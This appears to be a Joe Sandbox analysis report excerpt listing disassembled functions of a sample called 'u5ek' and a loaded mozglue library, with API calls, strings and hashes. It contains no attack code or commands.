Opcode ID: 2c295c23ca413915016e28324a45ecd92536ff76e179f83a20291ad59f389489
Instruction ID: dfd93c41c8d214068de21c6fb8033e77b877389f24935708907d48004fda609e
Opcode Fuzzy Hash: 2c295c23ca413915016e28324a45ecd92536ff76e179f83a20291ad59f389489
Instruction Fuzzy Hash: F021C170A042A89BDB14DF26C48577FBBB9EF42744F080459E9167B242D7BDE801CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD7B10 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6BBD7B51
__aulldiv.LIBCMT ref: 6BBD7B6C
__aulldiv.LIBCMT ref: 6BBD7B8B
__aulldiv.LIBCMT ref: 6BBD7BB1

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction ID: 82d2e6349a147f082f9eeb68154bbdbcde73b9edc352159363d6b0202f39c6cd
Opcode Fuzzy Hash: d00a51c4c5f930f9caa17efa13413b4b30e460f116377f5c22957434e894d04c
Instruction Fuzzy Hash: F8211F71F006095FD714CF7DCC86E6B7BE8EB85714B10853EE45AD7250E678A8008BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD7A10 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6BB8BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BBD7A3F), ref: 6BB8BF11
Part of subcall function 6BB8BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BBD7A3F), ref: 6BB8BF5D
Part of subcall function 6BB8BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BBD7A3F), ref: 6BB8BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000013,00000000), ref: 6BBD7A48
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_K@Z.MSVCP140(?,?), ref: 6BBD7A7A

Part of subcall function 6BB89830: free.MOZGLUE(?,?,?,6BBD7ABE), ref: 6BB8985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BBD7AC0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BBD7AC8

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: ee5c3a63549e3378eb3e9998bb044c0cd116ee5cac033b47a38b136a091eae64
Instruction ID: 40d7b13eb6f65959c309e34ee855271a26ae59c1995bd3c567fba635a48e2a9f
Opcode Fuzzy Hash: ee5c3a63549e3378eb3e9998bb044c0cd116ee5cac033b47a38b136a091eae64
Instruction Fuzzy Hash: 6E2171356043049FCB14DF28E895A6EFBE5FF89354F00481CE84687361CB35E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD7930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6BB8BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6BBD7A3F), ref: 6BB8BF11
Part of subcall function 6BB8BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6BBD7A3F), ref: 6BB8BF5D
Part of subcall function 6BB8BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6BBD7A3F), ref: 6BB8BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6BBD7968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6BBDA264,6BBDA264), ref: 6BBD799A

Part of subcall function 6BB89830: free.MOZGLUE(?,?,?,6BBD7ABE), ref: 6BB8985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6BBD79E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6BBD79E8

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: f4c1997b2a3255a98f3bde7d58261b0112c429dd54540341d98d569fb6559687
Instruction ID: 2e42c5e99c6575e5330b8f8494f273eabf8a5a82b18de2898855d348af52a95a
Opcode Fuzzy Hash: f4c1997b2a3255a98f3bde7d58261b0112c429dd54540341d98d569fb6559687
Instruction Fuzzy Hash: 842171356043049FCB14DF28D885A6EFBE5FF89354F04881DE84687361CB35E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6BBDAAE0 Relevance: 6.1, APIs: 4, Instructions: 59threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBDAAF8
EnterCriticalSection.KERNEL32(6BBFF770,?,6BB9BF9F), ref: 6BBDAB08
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,6BB9BF9F), ref: 6BBDAB39
LeaveCriticalSection.KERNEL32(6BBFF770,?,?,?,?,?,?,?,?,6BB9BF9F), ref: 6BBDAB6B

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread_stricmp
String ID:
API String ID: 1951318356-0
Opcode ID: 3591ae27e6b52e615b2e04162592f1841bb893bc000c11f427cd4fd9bcafa728
Instruction ID: 6fe0c50ebb2bffa7fe55c1de16e9d6f055ce9e4a10ea159370e3d91354f038e6
Opcode Fuzzy Hash: 3591ae27e6b52e615b2e04162592f1841bb893bc000c11f427cd4fd9bcafa728
Instruction Fuzzy Hash: D11154B5E012499FCF00DFA8E8859AFBBB9FF493047044429E50597301E739E909CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00414ED0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00414F1C
HeapAlloc.KERNEL32(00000000), ref: 00414F23
wsprintfA.USER32 ref: 00414F3D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

%dx%d, xrefs: 00414F34

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 2716131235-2206825331
Opcode ID: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction ID: 6eb13fdbeba78ce7d97bae5a893604665d2c333b41188d65ffcc19bab192dd48
Opcode Fuzzy Hash: f08cde69876725b708423540da4c5a3f365b361f564d4ee0880696cb78a15392
Instruction Fuzzy Hash: 5C112DB1A40708AFDB10DFE4DD49FBE77B9FB48701F104548FA09AB280CA719901CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00416F20 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 00416F72
lstrcat.KERNEL32(00000000), ref: 00416F82

Strings

6F@, xrefs: 00416F29
6F@, xrefs: 00416F37

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: lstrcatlstrcpy
String ID: 6F@$6F@
API String ID: 3905823039-140834422
Opcode ID: 0fd21debb5ed307de285645c5bfc8b86321b2cbbfd8b437667256a76d532ad3c
Instruction ID: 671097608d67a6365fb22a17cf1e01146cf6df4f1a405ab7b22d056337cae9f2
Opcode Fuzzy Hash: 0fd21debb5ed307de285645c5bfc8b86321b2cbbfd8b437667256a76d532ad3c
Instruction Fuzzy Hash: F411D674A00208ABCB04DF94E884AEEB375BF44304F518599E829AB391C734AA85CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00414450 Relevance: 6.0, APIs: 4, Instructions: 34memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,0041D748,00000000,?,00000000,0041D2B1), ref: 0041445D
HeapAlloc.KERNEL32(00000000), ref: 00414464
GetLocalTime.KERNEL32(?), ref: 00414471
wsprintfA.USER32 ref: 004144A0

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction ID: 4df586b6dc15b0ab72eaa90ec8b013cc5aca6a98c8dd6c86bd1e3c66c74c2495
Opcode Fuzzy Hash: ecd3a08835dc28e24e172d3ec6c3ea9534f2ed94b9f2de78f98134f4a4fefc06
Instruction Fuzzy Hash: 1FF06DB6804618ABCB20DBD9DD48DBFB3FDBF4CB02F000549FA46A2180E6384A41D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 6BBBEB00 Relevance: 6.0, APIs: 4, Instructions: 30threadsynchronizationCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBBEB11
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6BBBEB3C
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8), ref: 6BBBEB5B
GetCurrentThreadId.KERNEL32 ref: 6BBBEBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6BBBEBAC
GetCurrentThreadId.KERNEL32 ref: 6BBBEBC1
AcquireSRWLockExclusive.KERNEL32(6BBFF4B8,?,?,00000000), ref: 6BBBEBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6BBBEBE5
ReleaseSRWLockExclusive.KERNEL32(6BBFF4B8,00000000), ref: 6BBBEC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BBBEC46
CloseHandle.KERNEL32(?), ref: 6BBBEC55
free.MOZGLUE(00000000), ref: 6BBBEC5C

Strings

[I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6BBBEA9B
[I %d/%d] profiler_start, xrefs: 6BBBEBB4

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$CurrentThread$AcquireRelease$?profiler_init@baseprofiler@mozilla@@CloseHandleObjectSingleWait_getpidfreememset
String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)$[I %d/%d] profiler_start
API String ID: 2885072826-1186885292
Opcode ID: 10183d728a29ff1fb762cfce4a702170a3d5cda4bc114536ea53f572aba3e33e
Instruction ID: f2f4ee7a71b782d7f5c6b40646695b41ba40dc093a8e6325abfeecda7dc87d3e
Opcode Fuzzy Hash: 10183d728a29ff1fb762cfce4a702170a3d5cda4bc114536ea53f572aba3e33e
Instruction Fuzzy Hash: 1AF0A735A022509BEB205F69F885B7D7B6CEB82295F000465E605D3350CB7AD446C775

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC20B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6BBC20B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6BBAFBD1), ref: 6BBC20C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6BBAFBD1), ref: 6BBC20DA
free.MOZGLUE(00000000,?,6BBAFBD1), ref: 6BBC20F1

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 0fa1cfd2398eea620e7f6142d8da432fb532522a23ec99ee80bbb40da7c23d5d
Instruction ID: 5ba36317777cdf994ab85a2720b22d8b58e51f59623d8209db7b38c845fb4039
Opcode Fuzzy Hash: 0fa1cfd2398eea620e7f6142d8da432fb532522a23ec99ee80bbb40da7c23d5d
Instruction Fuzzy Hash: 18E0ED35500A148FC230DF35E80565FBBEEFF86214B00062BE54A83600EB7AE9428ADA

Uniqueness

Uniqueness Score: -1.00%

Function 6BB79A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BB79B2C
memcpy.VCRUNTIME140(6BB799CF,00000000,?), ref: 6BB79BB6
memcpy.VCRUNTIME140(?,?,?), ref: 6BB79BF8
memcpy.VCRUNTIME140(?,?,?), ref: 6BB79DE4

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 67417d22b0a3916f566ee3a79fae89fdea652fccac4bdb564d0f9db9e583b891
Instruction ID: 0419272b96b876971536f1fe016463e0b4e1c0a1391aa2ecb3a48fb31b90ab83
Opcode Fuzzy Hash: 67417d22b0a3916f566ee3a79fae89fdea652fccac4bdb564d0f9db9e583b891
Instruction Fuzzy Hash: AFD18B71A0024A9FCF24CF68C881AAEBBF2FF88314F184529E956A7351D775ED11CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6BBC0A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

Part of subcall function 6BB837F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6BBD145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6BB8380A

Part of subcall function 6BBB8DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6BBD06E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6BBB8DCC

Part of subcall function 6BBC0B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6BBC138F,?,?,?), ref: 6BBC0B80

?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6BBC138F,?,?,?), ref: 6BBC0B27
free.MOZGLUE(?,?,?,?,?,6BBC138F,?,?,?), ref: 6BBC0B3F

Strings

baseprofiler::profiler_capture_backtrace, xrefs: 6BBC0AB5

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
String ID: baseprofiler::profiler_capture_backtrace
API String ID: 3592261714-147032715
Opcode ID: 6f3aeeebe035d8019b5229f3cb39441578064e62e6774593818b690dad27366b
Instruction ID: d138d0b7ce0725cc1b1388619d64e9d03f561c1ae068e8b30f757b2f16cdff66
Opcode Fuzzy Hash: 6f3aeeebe035d8019b5229f3cb39441578064e62e6774593818b690dad27366b
Instruction Fuzzy Hash: 8821D6B4A002859BDB04DF68D891BBF73BAEF85708F44046CE9159B341DB79E901CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6BB7F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

calloc.MOZGLUE(?,?), ref: 6BB7F19B

Part of subcall function 6BB9D850: EnterCriticalSection.KERNEL32(?), ref: 6BB9D904
Part of subcall function 6BB9D850: LeaveCriticalSection.KERNEL32(?), ref: 6BB9D971
Part of subcall function 6BB9D850: memset.VCRUNTIME140(?,00000000,?), ref: 6BB9D97B

mozalloc_abort.MOZGLUE(?), ref: 6BB7F209

Strings

d, xrefs: 6BB7F1F5

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
String ID: d
API String ID: 3775194440-2564639436
Opcode ID: a94394600e3f16d00822a6cee3032e2ae28a386961a53edc5f2a86bd3613bb3a
Instruction ID: 33883ba3c576ae0d59545d4383f1a97bcb0d9914216032bb3a1f38f4c6facec0
Opcode Fuzzy Hash: a94394600e3f16d00822a6cee3032e2ae28a386961a53edc5f2a86bd3613bb3a
Instruction Fuzzy Hash: 03115932E04AC987DB049F68D9611BEB36ADF86218B01513DEC15AB212EB75EA84C384

Uniqueness

Uniqueness Score: -1.00%

Function 00415260 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

GetSystemTime.KERNEL32(?,042F7D68,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Strings

#F@, xrefs: 0041526C, 004152E5, 004152F0, 00415304, 004152D3, 004152F3
#F@, xrefs: 004152B1, 004152E1, 004152E4

Memory Dump Source

Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_u5ek.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: #F@$#F@
API String ID: 62757014-661595268
Opcode ID: 3a859b8b0cbacdc11ebfb3e047a024e7a283962ea90257fbacdd3e9563b3f0f0
Instruction ID: 513f033f75459e748f43dcf9dcce4e772375218857ee2e068f26327ba23d5006
Opcode Fuzzy Hash: 3a859b8b0cbacdc11ebfb3e047a024e7a283962ea90257fbacdd3e9563b3f0f0
Instruction Fuzzy Hash: 8511D636D00108DFCB04EFA9D891AEE7B75EF98304F54C05EE41567251DF38AA85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6BB8CA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(?), ref: 6BB8CA26

Part of subcall function 6BB8CAB0: EnterCriticalSection.KERNEL32(?), ref: 6BB8CB49
Part of subcall function 6BB8CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6BB8CBB6

mozalloc_abort.MOZGLUE(?), ref: 6BB8CAA2

Strings

d, xrefs: 6BB8CA6C

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalSection$EnterLeavemallocmozalloc_abort
String ID: d
API String ID: 3517139297-2564639436
Opcode ID: de4ba19956b0b6a03b3dabde3ffd2df43b9c52e01924382baf1bac835e60c8db
Instruction ID: 8346e9abc0afe3794ebf9c25b47036e18ea35a1207fa4f5b8207e6a3a093befe
Opcode Fuzzy Hash: de4ba19956b0b6a03b3dabde3ffd2df43b9c52e01924382baf1bac835e60c8db
Instruction Fuzzy Hash: 511121B1D00A9893DB01DB68D8110BDB375EF96214F049319DC49AB212FB35E5C5C380

Uniqueness

Uniqueness Score: -1.00%

Function 6BB91A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

realloc.MOZGLUE(?,?), ref: 6BB91A6B

Part of subcall function 6BB91AF0: EnterCriticalSection.KERNEL32(?), ref: 6BB91C36

mozalloc_abort.MOZGLUE(?), ref: 6BB91AE7

Strings

d, xrefs: 6BB91AB1

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd

Similarity

API ID: CriticalEnterSectionmozalloc_abortrealloc
String ID: d
API String ID: 2670432147-2564639436
Opcode ID: 4ca4f2e2f6cdceb6b79ea264308b022c0f9e390c6d75829ce04677391d6e551e
Instruction ID: 82bdcc70cc7e66e5146d5a14841936c4a0413f9ef60501df7b5abbc963fdc9a4
Opcode Fuzzy Hash: 4ca4f2e2f6cdceb6b79ea264308b022c0f9e390c6d75829ce04677391d6e551e
Instruction Fuzzy Hash: 23113631E006ACA3CF049BA8E8114BEB779EF86214F088628DD595B212EB75E9C0C380

Uniqueness

Uniqueness Score: -1.00%

Function 6BBD5900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6BBF51C8), ref: 6BBD591A
CloseHandle.KERNEL32(FFFFFFFF), ref: 6BBD592B

Strings

MOZ_SKELETON_UI_RESTARTING, xrefs: 6BBD5915

Memory Dump Source

Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true

Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
